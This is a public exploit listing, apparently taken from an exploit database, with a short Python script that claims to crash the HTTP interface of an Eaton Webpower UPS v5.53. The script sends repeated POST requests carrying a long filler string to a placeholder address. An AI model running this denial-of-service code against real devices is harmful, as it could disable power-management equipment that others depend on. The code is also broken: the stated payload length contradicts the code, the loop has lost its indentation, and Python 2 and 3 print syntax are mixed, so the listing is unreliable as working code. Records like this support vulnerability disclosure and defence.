Share
## https://sploitus.com/exploit?id=PACKETSTORM:173284
# Exploit Title: Webpower UPS v5.53 HTTP Denial of Service
# Date: 2023-03-09
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.eaton.com/ae/en-gb.html
# Software Link: https://www.eaton.com/ae/en-gb.html
# Version: Revision v5.53
# Tested on: WebPower UPS
# CVE: N/A
#!/usr/bin/env python
# Webpower UPS v5.53 HTTP Denial of Service.
# Discovered BY (Yehia Elghaly)
import requests
url = 'IP_Address'
data = {'Long_string' : 'a' * 12200}# 19700-character pattern
for i in range (16):
response = requests.post(url, data=data)
print("Response {}: {}".format(i+1, response.status_code))
print "crach"